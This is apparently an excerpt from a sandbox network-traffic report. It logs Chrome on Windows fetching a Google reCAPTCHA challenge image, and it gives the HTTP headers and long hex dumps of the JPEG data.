                                                                                                                          2024-12-19 16:08:20 UTC709INData Raw: 39 32 31 31 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 9211JFIFC!"$"$C,,"}!1AQa"q
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: 5d 58 88 e4 6c 7f 75 72 07 d6 9d 0d 9c a5 81 01 94 74 c9 5e 05 3e 61 72 99 06 de 42 09 d8 d8 1d f1 50 b4 27 d2 b6 b5 7b 1b 8d 37 4e 9e f9 a0 92 54 85 77 1d 84 1c d6 04 7f 11 7c 25 16 83 f6 d4 96 59 ee c9 21 6d 19 36 3f 1c 64 9e 80 67 b9 fc aa 27 88 85 35 79 31 aa 4e 4e c5 94 82 c9 21 79 ae ee be cf 1a 0c 96 65 e2 b9 0b dd 6e ff 00 5a 92 4b 0f 0b c7 e5 db ab 62 4d 42 5e 06 3f d8 04 f3 eb f8 75 ac ab 8d 70 78 8d fe df ac 3f 9b 0e 5c a6 9b 6f c2 2e dc 60 b9 ce 39 cf 7f 4e 86 b3 75 cd 5d 96 d1 fe d1 2c 56 fa 7b 4e ab f6 54 93 11 ae 40 fb d8 cb 3e 00 cf 20 f4 e8 2b 86 b6 3b 9d 7b af 43 ba 8e 12 31 5c d2 31 75 c8 e3 b3 f1 3c 56 5a 75 d3 ea 32 3c 0f ba 51 26 51 9f 60 1c b6 30 46 72 38 e0 7e 15 1d 95 f6 a1 65 67 34 b7 90 79 52 b8 20 95 50 f9 e4 9f 93 04 73 9f 5c
                                                                                                                          Data Ascii: ]Xlurt^>arBP'{7NTw|%Y!m6?dg'5y1NN!yenZKbMB^?upx?\o.`9Nu],V{NT@> +;{C1\1u<VZu2<Q&Q`0Fr8~eg4yR Ps\
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: 9e 07 e3 48 0a 16 b2 dc 3d 92 bb 47 f6 79 58 9d d1 11 9c 72 40 e4 1c 1e 2a b6 93 7a eb a1 59 de 6a 17 70 42 65 b6 49 25 66 21 10 31 4d c7 96 e9 dc fe 15 0f 89 7c 4f a6 68 1a 63 dd 6a 0e 1a e3 cc 68 d2 08 9b 73 31 0c 40 c9 c6 07 03 3c fe 19 af 06 d5 b5 bd 4f 5b 8f 4b 8f 51 bb 73 68 aa 89 1d bf 9b 80 32 30 3e 55 18 ce 09 00 9e 71 f9 56 75 2b c2 9e 9d 4d 29 d1 95 4d 7a 1e 8b e2 cf 8a 30 c5 6d 75 06 98 cb 34 21 36 2c 92 49 fe b7 72 90 70 9c 11 83 df 9c fa 57 8a c5 34 45 9e d6 de 28 57 ce 3f bd 39 26 46 24 f1 ef 8e 7e 9f a6 37 35 bb 6b 06 88 dd 48 92 44 a8 aa 49 8b 68 50 0a 82 78 39 24 f3 eb cf b5 72 37 5e 5a dd 45 e5 43 00 3b b6 06 94 ed 0c a4 b7 27 df 9c 67 b6 2b c7 c4 54 9d 49 fb fb 1b 72 a8 3b 23 7f c3 c6 6b 6b a8 21 fb 4f f6 7d bb ca 82 75 93 69 56 89 db
                                                                                                                          Data Ascii: H=GyXr@*zYjpBeI%f!1M|Ohcjhs1@<O[KQsh20>UqVu+M)Mz0mu4!6,IrpW4E(W?9&F$~75kHDIhPx9$r7^ZEC;'g+TIr;#kk!O}uiV
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: 5f 3c 22 2d ec c0 28 cf 40 71 5a 81 49 af 28 b4 f1 46 a9 a6 d9 25 ad a3 43 04 4a 49 01 62 dd d4 fb e6 b2 6f b5 4b bb cb 96 b8 b9 95 e5 79 0e 49 3c 0f c8 71 50 ea ae 83 e5 3d 8b 55 ba 36 90 12 bc be 32 06 2b 96 d7 75 0b b9 a3 49 e2 3b 54 74 c7 af 5f c2 bc f3 cc 56 2d bd 54 63 a1 cf 6a ed 21 ba 91 d0 32 b4 b1 8c 28 c6 ec 76 14 e3 3e 61 4b 42 94 da ad d2 d9 0d ae fc 36 4e 3f 03 9c fd 4d 5c 49 49 86 36 95 c1 72 b9 20 b6 31 cf 4f ce ad 4f 6b 66 f0 88 9a 45 49 1e 52 f2 12 bd b9 e0 7e 9e 95 91 25 cb db c8 d0 ac 6a 4a 92 18 93 cf b6 71 ed 8a 6d 02 3c 8a d5 2d e4 ba c4 4e c0 79 45 02 03 9e f9 eb 54 2e 6e 2e 2c ee 08 8a 72 1a 39 50 84 23 1b b1 92 09 f6 e7 1f 8d 4d 69 3c 30 5e 41 24 57 05 1b 69 05 82 67 19 53 f5 fe 54 08 ad 66 b7 92 6b 9b 92 5a 63 29 66 de 85 8e 24
                                                                                                                          Data Ascii: _<"-(@qZI(F%CJIboKyI<qP=U62+uI;Tt_V-Tcj!2(v>aKB6N?M\II6r 1OOkfEIR~%jJqm<-NyET.n.,r9P#Mi<0^A$WigSTfkZc)f$
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: ed 5c ef 8b 74 6d 41 f2 96 29 73 34 8b bb 7c 8e 32 ca 4f b9 e7 24 6e e8 72 38 ce 2b a2 10 5c c9 65 34 56 37 0e 81 b2 aa d2 2e 18 b1 e3 90 7a 64 b6 71 9e 46 7a e2 aa f8 a2 eb 4e b7 8d c4 6b 2a dc 3a 8d 81 b9 08 09 1c 91 83 8e 14 8e 3a fa 52 a6 ec d5 bf af 91 a3 5c aa cf fa fc 8e 12 fd 3c ef b0 5b 43 3a 81 23 aa ca b2 ee 91 99 86 4e ec e7 18 23 93 d7 1f 8d 58 75 9f 52 9a dd 2f 45 bc 11 48 e1 0a 2c 85 e4 6c 72 41 19 38 ef 9e 3a 9f 6a d5 bc b1 8a d6 f2 c4 4c ab 2d d3 06 95 a4 45 e1 14 a9 01 4e 48 e7 2d 93 d7 f4 35 a3 6f a7 f8 6e f6 cc 3f 9b 35 b4 91 c1 b8 aa 4b 8e 4f 52 c7 8c e0 90 7a 76 e6 bd 0a 93 fd c4 65 dd b3 86 0f da 57 6a 5d 97 de 3a 57 b0 7d 31 6e 07 d9 a0 2a ec b6 ff 00 31 da 0e 4f cc 40 e4 e7 d4 f2 70 3a 56 75 e7 89 35 49 ae 18 9b eb bc 3b 1e 05 c3
                                                                                                                          Data Ascii: \tmA)s4|2O$nr8+\e4V7.zdqFzNk*::R\<[C:#N#XuR/EH,lrA8:jL-ENH-5on?5KORzveWj]:W}1n*1O@p:Vu5I;
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: 46 0e 4e 3a 56 37 82 34 cb 5b cd 5a 61 7b 32 44 f0 28 22 42 c3 63 10 a4 0d c3 eb 8c 1f 73 51 78 4a 9b 76 23 92 32 bd f5 3a 8b 4b b3 a8 44 16 ee ee ec 4b 1a 07 8c b7 23 71 3e de 9c 00 4f 6f ce a7 d6 35 7b c0 91 ae 9d 19 5b 36 60 0b b3 83 bb 3d 4f 1c 1e bd fd 2b 6e 0b 6d 1f 4c f2 19 dc 42 d2 0c 47 18 60 72 bd 76 9c f3 9c e3 a1 f4 1f 5c cd 62 5b 57 06 18 ad a4 11 ec 43 26 ef 91 17 03 01 4e ee 01 1b bf 5a e4 8b 5c da ad 3f af 91 5c ae a4 d4 20 af fd 7f 5f a1 9f e1 6d 46 da 7d 4e f4 5f 23 bb 82 04 11 9c 3e c7 ce 30 18 fd e5 00 b7 bf 0d eb 5a 17 7a cc 8c f6 36 c1 5e 25 74 27 63 30 7e 58 67 39 e8 38 1f af 4e 05 50 d3 ed 77 eb f7 50 47 0c b2 bc e0 65 e3 42 c5 59 81 18 1d 89 04 e4 9e c4 9e 6b a3 d7 7c 3b b3 c3 f6 b3 7d 9e 5b 49 a0 de a6 3b 8f be 48 53 96 19 ea 33
                                                                                                                          Data Ascii: FN:V74[Za{2D("BcsQxJv#2:KDK#q>Oo5{[6`=O+nmLBG`rv\b[WC&NZ\?\ _mF}N_#>0Zz6^%t'c0~Xg98NPwPGeBYk|;}[I;HS3
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: aa 89 1c 85 54 40 c1 8f 38 c0 27 a7 5c 7d 6b 3a b0 6e 6f ae da 9a d0 92 8a d5 13 c4 66 f2 94 e1 97 a2 ee 0d d3 3d 7a f1 c9 39 f5 eb 5d 5f 87 b5 6b 0b 46 92 5f 21 25 bb 24 2c 5b 86 f4 8d 54 16 27 6f 42 7f 4c 96 15 c7 16 91 53 6a 21 88 2e 36 8e 41 23 8c 75 1d ba 63 d7 d6 9f 23 5e 44 19 99 99 c3 2f cf b8 72 b9 e9 f5 e0 d7 3d 6a 1e d2 c6 f4 eb 42 09 f3 2d 4f 55 7f 12 da dc 8b 66 bb 82 30 64 8b 22 20 59 72 b9 23 24 ee 00 8c e7 8f 4a bf 77 a8 db 1b 41 2d f9 b7 8a 19 a5 cf ee 94 31 2a 09 f9 86 40 23 1b 4f 27 20 9e d5 e4 22 7b b4 81 56 49 64 32 15 1b 5b 39 2a a0 0d ab 93 92 07 00 fb e6 87 bd d4 d5 15 4d ed c1 85 57 1f 78 a0 1d 70 a4 63 3d 7b d7 14 f2 fe 64 92 76 fe ba 1d 58 3c 5d 1a 33 75 25 06 df f5 f8 9f 43 fc 3f 8a 17 d4 65 d5 64 bc 6b 38 32 22 8e 39 54 b0 6c
                                                                                                                          Data Ascii: T@8'\}k:nof=z9]_kF_!%$,[T'oBLSj!.6A#uc#^D/r=jB-OUf0d" Yr#$JwA-1*@#O' "{VId2[9*MWxpc={dvX<]3u%C?edk82"9Tl
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: f6 45 05 5b 83 d3 af 5e d8 20 fb 63 f1 a7 43 1c 7e 6b 4a c8 59 50 2f 99 90 0a cb cf 03 81 c9 27 1f 87 35 d8 e8 ba 0d e6 a7 04 57 76 73 d8 c7 25 94 4a 64 4f 35 5b 79 ed 85 fe 26 3e 80 71 f8 f3 07 88 3c 34 ba 7d 85 b0 49 8b 32 90 b2 84 47 63 e6 10 a4 0c e0 0d ab 80 99 eb 90 4f a5 65 f5 88 b5 66 f7 0e 46 ed a6 ff 00 d7 f9 9c 9b 62 65 56 96 76 05 89 df 83 c1 dd fa 67 af 18 c5 36 e9 be 56 26 32 33 ca b9 23 03 a0 c6 78 e3 38 cf b1 19 ab f1 da 48 4f 98 b3 90 a8 84 a0 68 42 95 27 68 ef 9e a7 be 3d 3a 75 a8 e6 b3 fd ee df b2 07 2d b7 69 07 97 c7 27 80 07 a7 d4 73 eb 5a aa 8a e1 ef 23 d5 3f 67 4d 5f 78 b9 d3 56 e3 ec b2 33 89 f2 23 de cc 02 81 8c 0f e1 e3 ea 0e 0d 7a 47 c4 ab 3b ab cb 08 95 62 49 4b 4c db 8a 36 e7 dc 0e 46 0f 43 81 ce 3b 62 bc 8b e1 dd d5 ef 86 ae
                                                                                                                          Data Ascii: E[^ cC~kJYP/'5Wvs%JdO5[y&>q<4}I2GcOefFbeVvg6V&23#x8HOhB'h=:u-i'sZ#?gM_xV3#zG;bIKL6FC;b
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: d5 ad 19 36 f9 10 da 3f 2d 2e 77 02 18 ee d9 c8 dd 81 93 c0 e9 4d 1a 65 a3 c2 e2 d8 49 0b a3 93 25 b4 8e 46 e0 0f 25 5f 38 c8 23 23 38 3d b2 dc e1 4d fb 97 8e ff 00 d7 e2 39 45 c5 26 9a 69 ff 00 5d 3f e1 bc ce ae 6f 88 28 84 04 d2 bc d0 a0 99 5b ed 21 55 31 d3 1f 2e 48 ea 7a 0a a5 ff 00 0b 50 28 8f 6e 83 bd 5c 6e 24 5d fd d5 c7 27 ee 63 8c 7f 2f 5a e1 35 79 ee a1 59 2c e7 8a 5d db 84 32 a4 b9 50 71 d1 7a 1c 01 bb db f4 aa 70 e6 48 a4 82 49 81 77 75 77 24 6e 21 40 c6 70 4e 3f 96 49 f6 c5 28 29 46 37 99 8d e5 29 e9 74 8f 51 3f 14 15 51 5d 34 5c 7c bb 98 c9 77 b7 62 fa 9c 21 eb ce 07 7c 55 9f f8 59 0b e5 3b 8d 21 9c ab 01 b5 27 2c 71 df 1f 27 38 f4 af 2a 82 6b 64 ba 2c d2 b6 e4 43 b9 5a 11 b5 09 2d d7 39 e3 e6 1d 32 7a f4 ab 96 bf 69 92 77 95 56 36 8c a0 46
                                                                                                                          Data Ascii: 6?-.wMeI%F%_8##8=M9E&i]?o([!U1.HzP(n\n$]'c/Z5yY,]2PqzpHIwuw$n!@pN?I()F7)tQ?Q]4\|wb!|UY;!',q'8*kd,CZ-92ziwV6F
                                                                                                                          2024-12-19 16:08:20 UTC1390INData Raw: 95 6f be 38 88 12 18 d7 2e 57 20 67 8e 0b 6d cf 52 3e 61 c9 cd 4d 6c f6 d1 b8 6f b1 5b c4 88 08 79 13 0c 14 0c 03 8e 01 ea 7f 20 4f b5 5e 11 cd e6 b0 f2 59 24 f3 8a b0 13 80 36 8c 01 ee 7a 31 e4 7a fd 28 9a ce 10 d1 c8 b1 f9 a3 ef a1 2b c1 27 04 2e d1 9d 80 1e 7a ff 00 11 1d 31 5b fb 3a 69 d9 ae 9f 77 f5 d0 c3 db 4f 6b ea fb 6a fe ef eb f3 2b bd cc 8a 1f cc 8d 14 c4 c0 48 04 80 95 07 18 6c 01 c8 e4 e3 1d 71 51 cb 71 22 48 d1 3a 22 3a 80 58 4b 20 40 3e f6 46 7b 1e 06 3d 73 9e 00 cd 5e 5b 45 92 60 b1 ab 79 9f 31 5f 97 39 24 36 08 23 b7 19 c1 27 03 07 39 35 22 c4 f0 a6 e9 ad 95 70 ec cc c4 e5 46 57 3f 37 40 49 5d a4 f2 30 01 a4 e9 d3 5a f2 fe 3f d7 f9 eb e4 5a ad 3d 3f af eb fa 57 33 16 74 96 47 8d 21 40 ca a5 be 63 ce d0 40 c9 f4 eb f8 55 4d 57 4e 86 fa 36
                                                                                                                          Data Ascii: o8.W gmR>aMlo[y O^Y$6z1z(+'.z1[:iwOkj+HlqQq"H:":XK @>F{=s^[E`y1_9$6#'95"pFW?7@I]0Z?Z=?W3tG!@c@UMWN6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.1649754172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:22 UTC816OUTGET /recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:23 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:23 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:23 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:23 UTC709INData Raw: 39 32 31 31 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 9211JFIFC!"$"$C,,"}!1AQa"q
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: 5d 58 88 e4 6c 7f 75 72 07 d6 9d 0d 9c a5 81 01 94 74 c9 5e 05 3e 61 72 99 06 de 42 09 d8 d8 1d f1 50 b4 27 d2 b6 b5 7b 1b 8d 37 4e 9e f9 a0 92 54 85 77 1d 84 1c d6 04 7f 11 7c 25 16 83 f6 d4 96 59 ee c9 21 6d 19 36 3f 1c 64 9e 80 67 b9 fc aa 27 88 85 35 79 31 aa 4e 4e c5 94 82 c9 21 79 ae ee be cf 1a 0c 96 65 e2 b9 0b dd 6e ff 00 5a 92 4b 0f 0b c7 e5 db ab 62 4d 42 5e 06 3f d8 04 f3 eb f8 75 ac ab 8d 70 78 8d fe df ac 3f 9b 0e 5c a6 9b 6f c2 2e dc 60 b9 ce 39 cf 7f 4e 86 b3 75 cd 5d 96 d1 fe d1 2c 56 fa 7b 4e ab f6 54 93 11 ae 40 fb d8 cb 3e 00 cf 20 f4 e8 2b 86 b6 3b 9d 7b af 43 ba 8e 12 31 5c d2 31 75 c8 e3 b3 f1 3c 56 5a 75 d3 ea 32 3c 0f ba 51 26 51 9f 60 1c b6 30 46 72 38 e0 7e 15 1d 95 f6 a1 65 67 34 b7 90 79 52 b8 20 95 50 f9 e4 9f 93 04 73 9f 5c
                                                                                                                          Data Ascii: ]Xlurt^>arBP'{7NTw|%Y!m6?dg'5y1NN!yenZKbMB^?upx?\o.`9Nu],V{NT@> +;{C1\1u<VZu2<Q&Q`0Fr8~eg4yR Ps\
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: 9e 07 e3 48 0a 16 b2 dc 3d 92 bb 47 f6 79 58 9d d1 11 9c 72 40 e4 1c 1e 2a b6 93 7a eb a1 59 de 6a 17 70 42 65 b6 49 25 66 21 10 31 4d c7 96 e9 dc fe 15 0f 89 7c 4f a6 68 1a 63 dd 6a 0e 1a e3 cc 68 d2 08 9b 73 31 0c 40 c9 c6 07 03 3c fe 19 af 06 d5 b5 bd 4f 5b 8f 4b 8f 51 bb 73 68 aa 89 1d bf 9b 80 32 30 3e 55 18 ce 09 00 9e 71 f9 56 75 2b c2 9e 9d 4d 29 d1 95 4d 7a 1e 8b e2 cf 8a 30 c5 6d 75 06 98 cb 34 21 36 2c 92 49 fe b7 72 90 70 9c 11 83 df 9c fa 57 8a c5 34 45 9e d6 de 28 57 ce 3f bd 39 26 46 24 f1 ef 8e 7e 9f a6 37 35 bb 6b 06 88 dd 48 92 44 a8 aa 49 8b 68 50 0a 82 78 39 24 f3 eb cf b5 72 37 5e 5a dd 45 e5 43 00 3b b6 06 94 ed 0c a4 b7 27 df 9c 67 b6 2b c7 c4 54 9d 49 fb fb 1b 72 a8 3b 23 7f c3 c6 6b 6b a8 21 fb 4f f6 7d bb ca 82 75 93 69 56 89 db
                                                                                                                          Data Ascii: H=GyXr@*zYjpBeI%f!1M|Ohcjhs1@<O[KQsh20>UqVu+M)Mz0mu4!6,IrpW4E(W?9&F$~75kHDIhPx9$r7^ZEC;'g+TIr;#kk!O}uiV
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: 5f 3c 22 2d ec c0 28 cf 40 71 5a 81 49 af 28 b4 f1 46 a9 a6 d9 25 ad a3 43 04 4a 49 01 62 dd d4 fb e6 b2 6f b5 4b bb cb 96 b8 b9 95 e5 79 0e 49 3c 0f c8 71 50 ea ae 83 e5 3d 8b 55 ba 36 90 12 bc be 32 06 2b 96 d7 75 0b b9 a3 49 e2 3b 54 74 c7 af 5f c2 bc f3 cc 56 2d bd 54 63 a1 cf 6a ed 21 ba 91 d0 32 b4 b1 8c 28 c6 ec 76 14 e3 3e 61 4b 42 94 da ad d2 d9 0d ae fc 36 4e 3f 03 9c fd 4d 5c 49 49 86 36 95 c1 72 b9 20 b6 31 cf 4f ce ad 4f 6b 66 f0 88 9a 45 49 1e 52 f2 12 bd b9 e0 7e 9e 95 91 25 cb db c8 d0 ac 6a 4a 92 18 93 cf b6 71 ed 8a 6d 02 3c 8a d5 2d e4 ba c4 4e c0 79 45 02 03 9e f9 eb 54 2e 6e 2e 2c ee 08 8a 72 1a 39 50 84 23 1b b1 92 09 f6 e7 1f 8d 4d 69 3c 30 5e 41 24 57 05 1b 69 05 82 67 19 53 f5 fe 54 08 ad 66 b7 92 6b 9b 92 5a 63 29 66 de 85 8e 24
                                                                                                                          Data Ascii: _<"-(@qZI(F%CJIboKyI<qP=U62+uI;Tt_V-Tcj!2(v>aKB6N?M\II6r 1OOkfEIR~%jJqm<-NyET.n.,r9P#Mi<0^A$WigSTfkZc)f$
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: ed 5c ef 8b 74 6d 41 f2 96 29 73 34 8b bb 7c 8e 32 ca 4f b9 e7 24 6e e8 72 38 ce 2b a2 10 5c c9 65 34 56 37 0e 81 b2 aa d2 2e 18 b1 e3 90 7a 64 b6 71 9e 46 7a e2 aa f8 a2 eb 4e b7 8d c4 6b 2a dc 3a 8d 81 b9 08 09 1c 91 83 8e 14 8e 3a fa 52 a6 ec d5 bf af 91 a3 5c aa cf fa fc 8e 12 fd 3c ef b0 5b 43 3a 81 23 aa ca b2 ee 91 99 86 4e ec e7 18 23 93 d7 1f 8d 58 75 9f 52 9a dd 2f 45 bc 11 48 e1 0a 2c 85 e4 6c 72 41 19 38 ef 9e 3a 9f 6a d5 bc b1 8a d6 f2 c4 4c ab 2d d3 06 95 a4 45 e1 14 a9 01 4e 48 e7 2d 93 d7 f4 35 a3 6f a7 f8 6e f6 cc 3f 9b 35 b4 91 c1 b8 aa 4b 8e 4f 52 c7 8c e0 90 7a 76 e6 bd 0a 93 fd c4 65 dd b3 86 0f da 57 6a 5d 97 de 3a 57 b0 7d 31 6e 07 d9 a0 2a ec b6 ff 00 31 da 0e 4f cc 40 e4 e7 d4 f2 70 3a 56 75 e7 89 35 49 ae 18 9b eb bc 3b 1e 05 c3
                                                                                                                          Data Ascii: \tmA)s4|2O$nr8+\e4V7.zdqFzNk*::R\<[C:#N#XuR/EH,lrA8:jL-ENH-5on?5KORzveWj]:W}1n*1O@p:Vu5I;
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: 46 0e 4e 3a 56 37 82 34 cb 5b cd 5a 61 7b 32 44 f0 28 22 42 c3 63 10 a4 0d c3 eb 8c 1f 73 51 78 4a 9b 76 23 92 32 bd f5 3a 8b 4b b3 a8 44 16 ee ee ec 4b 1a 07 8c b7 23 71 3e de 9c 00 4f 6f ce a7 d6 35 7b c0 91 ae 9d 19 5b 36 60 0b b3 83 bb 3d 4f 1c 1e bd fd 2b 6e 0b 6d 1f 4c f2 19 dc 42 d2 0c 47 18 60 72 bd 76 9c f3 9c e3 a1 f4 1f 5c cd 62 5b 57 06 18 ad a4 11 ec 43 26 ef 91 17 03 01 4e ee 01 1b bf 5a e4 8b 5c da ad 3f af 91 5c ae a4 d4 20 af fd 7f 5f a1 9f e1 6d 46 da 7d 4e f4 5f 23 bb 82 04 11 9c 3e c7 ce 30 18 fd e5 00 b7 bf 0d eb 5a 17 7a cc 8c f6 36 c1 5e 25 74 27 63 30 7e 58 67 39 e8 38 1f af 4e 05 50 d3 ed 77 eb f7 50 47 0c b2 bc e0 65 e3 42 c5 59 81 18 1d 89 04 e4 9e c4 9e 6b a3 d7 7c 3b b3 c3 f6 b3 7d 9e 5b 49 a0 de a6 3b 8f be 48 53 96 19 ea 33
                                                                                                                          Data Ascii: FN:V74[Za{2D("BcsQxJv#2:KDK#q>Oo5{[6`=O+nmLBG`rv\b[WC&NZ\?\ _mF}N_#>0Zz6^%t'c0~Xg98NPwPGeBYk|;}[I;HS3
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: aa 89 1c 85 54 40 c1 8f 38 c0 27 a7 5c 7d 6b 3a b0 6e 6f ae da 9a d0 92 8a d5 13 c4 66 f2 94 e1 97 a2 ee 0d d3 3d 7a f1 c9 39 f5 eb 5d 5f 87 b5 6b 0b 46 92 5f 21 25 bb 24 2c 5b 86 f4 8d 54 16 27 6f 42 7f 4c 96 15 c7 16 91 53 6a 21 88 2e 36 8e 41 23 8c 75 1d ba 63 d7 d6 9f 23 5e 44 19 99 99 c3 2f cf b8 72 b9 e9 f5 e0 d7 3d 6a 1e d2 c6 f4 eb 42 09 f3 2d 4f 55 7f 12 da dc 8b 66 bb 82 30 64 8b 22 20 59 72 b9 23 24 ee 00 8c e7 8f 4a bf 77 a8 db 1b 41 2d f9 b7 8a 19 a5 cf ee 94 31 2a 09 f9 86 40 23 1b 4f 27 20 9e d5 e4 22 7b b4 81 56 49 64 32 15 1b 5b 39 2a a0 0d ab 93 92 07 00 fb e6 87 bd d4 d5 15 4d ed c1 85 57 1f 78 a0 1d 70 a4 63 3d 7b d7 14 f2 fe 64 92 76 fe ba 1d 58 3c 5d 1a 33 75 25 06 df f5 f8 9f 43 fc 3f 8a 17 d4 65 d5 64 bc 6b 38 32 22 8e 39 54 b0 6c
                                                                                                                          Data Ascii: T@8'\}k:nof=z9]_kF_!%$,[T'oBLSj!.6A#uc#^D/r=jB-OUf0d" Yr#$JwA-1*@#O' "{VId2[9*MWxpc={dvX<]3u%C?edk82"9Tl
                                                                                                                          2024-12-19 16:08:23 UTC1390INData Raw: f6 45 05 5b 83 d3 af 5e d8 20 fb 63 f1 a7 43 1c 7e 6b 4a c8 59 50 2f 99 90 0a cb cf 03 81 c9 27 1f 87 35 d8 e8 ba 0d e6 a7 04 57 76 73 d8 c7 25 94 4a 64 4f 35 5b 79 ed 85 fe 26 3e 80 71 f8 f3 07 88 3c 34 ba 7d 85 b0 49 8b 32 90 b2 84 47 63 e6 10 a4 0c e0 0d ab 80 99 eb 90 4f a5 65 f5 88 b5 66 f7 0e 46 ed a6 ff 00 d7 f9 9c 9b 62 65 56 96 76 05 89 df 83 c1 dd fa 67 af 18 c5 36 e9 be 56 26 32 33 ca b9 23 03 a0 c6 78 e3 38 cf b1 19 ab f1 da 48 4f 98 b3 90 a8 84 a0 68 42 95 27 68 ef 9e a7 be 3d 3a 75 a8 e6 b3 fd ee df b2 07 2d b7 69 07 97 c7 27 80 07 a7 d4 73 eb 5a aa 8a e1 ef 23 d5 3f 67 4d 5f 78 b9 d3 56 e3 ec b2 33 89 f2 23 de cc 02 81 8c 0f e1 e3 ea 0e 0d 7a 47 c4 ab 3b ab cb 08 95 62 49 4b 4c db 8a 36 e7 dc 0e 46 0f 43 81 ce 3b 62 bc 8b e1 dd d5 ef 86 ae
